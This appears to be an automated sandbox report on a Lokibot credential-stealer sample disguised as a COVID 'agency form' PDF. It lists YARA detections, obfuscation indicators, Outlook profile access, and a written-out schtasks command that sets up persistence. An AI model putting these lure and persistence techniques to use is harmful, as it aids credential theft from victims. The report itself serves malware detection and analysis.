Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229005900.0000000007110000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSparselyPopulated.dll@ vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.228871654.0000000006E70000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229926575.000000000EBB0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.230426036.000000000ECA0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.230426036.000000000ECA0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221241977.00000000003B6000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.229331155.0000000009270000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRelativeFileUrl.dllL vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000000.220566722.0000000000886000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Binary or memory string: OriginalFilenameInt16ArrayTypeInfo.exe: vs RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Uses 32bit PE files
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs Cryptographic APIs: 'CreateDecryptor'
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs Cryptographic APIs: 'CreateDecryptor'
Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs Cryptographic APIs: 'CreateDecryptor'
Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs Cryptographic APIs: 'CreateDecryptor'
Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs Cryptographic APIs: 'CreateDecryptor'
Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/6@0/1
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 6_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges, 6_2_0040650A
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 6_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize, 6_2_0040434D
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File created: C:\Users\user\AppData\Roaming\qvDFOnW.exe Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\jwmgAWN
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4244:120:WilError_01
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File created: C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp Jump to behavior
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Virustotal: Detection: 34%
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe ReversingLabs: Detection: 19%
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File read: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe'
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp' Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Process created: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Static file information: File size 1109504 > 1048576
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.1.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 6.0.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.7a0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Yara detected aPLib compressed binary
Source: Yara match File source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708, type: MEMORY
Source: Yara match File source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_002D8EC7 push es; retn 0000h 0_2_002D8ECA
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_00B8C148 push cs; ret 0_2_00B8C156
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_00B8B42A push es; ret 0_2_00B8B42E
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_00B89F93 push es; ret 0_2_00B89F97
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6DE7 push eax; iretd 0_2_04CF6DF2
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6DFF push ecx; iretd 0_2_04CF6E06
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6DF3 push ebx; iretd 0_2_04CF6DFA
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6EDF push ebx; iretd 0_2_04CF6EE6
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6E8F push edi; iretd 0_2_04CF6E92
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6E93 push edx; iretd 0_2_04CF6E96
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6EAF push edi; iretd 0_2_04CF6EB2
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6EAB push ebp; iretd 0_2_04CF6EAE
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6EB3 pushad ; iretd 0_2_04CF6EBA
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6E6F pushad ; iretd 0_2_04CF6E72
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6E0F push edx; iretd 0_2_04CF6E16
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6E3F push ebp; iretd 0_2_04CF6E42
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6E37 push edi; iretd 0_2_04CF6E3A
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF5634 push cs; retf 0_2_04CF5635
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6E33 push edi; iretd 0_2_04CF6E36
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6FEB push edx; iretd 0_2_04CF6FF2
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6FE7 push esp; iretd 0_2_04CF6FEA
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6F8F push ds; iretd 0_2_04CF6F9A
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6F9B push eax; iretd 0_2_04CF6F9E
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6FAB push ebp; iretd 0_2_04CF6FB2
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6F53 push ebx; iretd 0_2_04CF6F56
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6F6F push ebp; iretd 0_2_04CF6F72
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6F07 push edx; iretd 0_2_04CF6F0A
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6F17 push edi; iretd 0_2_04CF6F1A
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6F2F push ecx; iretd 0_2_04CF6F32
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6F27 push esp; iretd 0_2_04CF6F2A
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 0_2_04CF6F3B push eax; iretd 0_2_04CF6F3E
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.cs High entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs High entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.cs High entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.cs High entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.cs High entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
Source: qvDFOnW.exe.0.dr, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.cs High entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
Source: qvDFOnW.exe.0.dr, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs High entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
Source: qvDFOnW.exe.0.dr, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
Source: qvDFOnW.exe.0.dr, ML3LFDD5R0VNWJw5lq/tnkGD7lgAPwn8VbqeW.cs High entropy of concatenated method names: '.cctor', 'Lr6dZPdt2B', 'l7id665cu9', 'IDmdEHUkYO', '.ctor', 'L6udAJ5vKq', 'Vj7dh8Lfmh', 'aJPdVvf5Ct', 'MGxd3JujLd', 'fVHdGVMDKg'
Source: qvDFOnW.exe.0.dr, DuH5yrQLwuUs0REMlG/o3WxudYdqIOp1ISAbO.cs High entropy of concatenated method names: '.ctor', 'rNHxXx8GlM', 'h0dx9X893a', 'fiSxO8vkhK', 'GKTxjQub0Z', 'tQXx1O9BHS', 'a2mxzf0Cd6', 'AuLZdcIDkE', 'HLkZxajJHh', 'BLNZ6vg9lE'
Source: qvDFOnW.exe.0.dr, D0aORlo8jsHpwwwlBi/fo3uqgS19djuIhRc4J.cs High entropy of concatenated method names: '.cctor', '.ctor', 'OTcPwV68v', 'uYWJOKgwi', 'UsVH5or5o', 'ATL0WsxgF', 'oXxmDmxVc', 'q2fwxV4UD', 'QddqqIOp1', 'tSAfbOPuH'
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, CMGEZR8d9sV5or5oCT/OTcwV6T8vLYWOKgwix.cs High entropy of concatenated method names: '.cctor', 'z9ydY6ER8D', 'FCxdQipVZb', 'sLIdIBTMRo', 'oJGdLVFE43', 'xpxdRyHYFN', 'JhBdaUM7SO', 'lEhdijSmdY', 'UF0dB3uwFK', 'MUUdtwqgtF'
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, gZCsHhk6LU0YnGpPZF/QfRWq82JToxowssZ5I.cs High entropy of concatenated method names: '.cctor', 'hYKDNVuThr0tR', 'cgQZr4MJH9', 'Tv6Z1evBw9', 'g6cZzJCx19', 'mlB6gleQlU', 'do86dVGMDT', 'y8A6xbswHg', 'eNy6ZoenxX', 'mNr660NRAv'
Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.2d0000.0.unpack, dbnXlqp7dn8caOjpkD/KESKfVUYeSsL3MMKqs.cs High entropy of concatenated method names: '.ctor', 'Dispose', 'yYtdls8T6v', 'o9UEip5rjI', 'pRBEBVI2li', 'NKFEtCIav9', 'dc8EnLMpuG', 'xeRECMRGVv', 'cvDEslt5eo', 'GwLE4lsLUu'
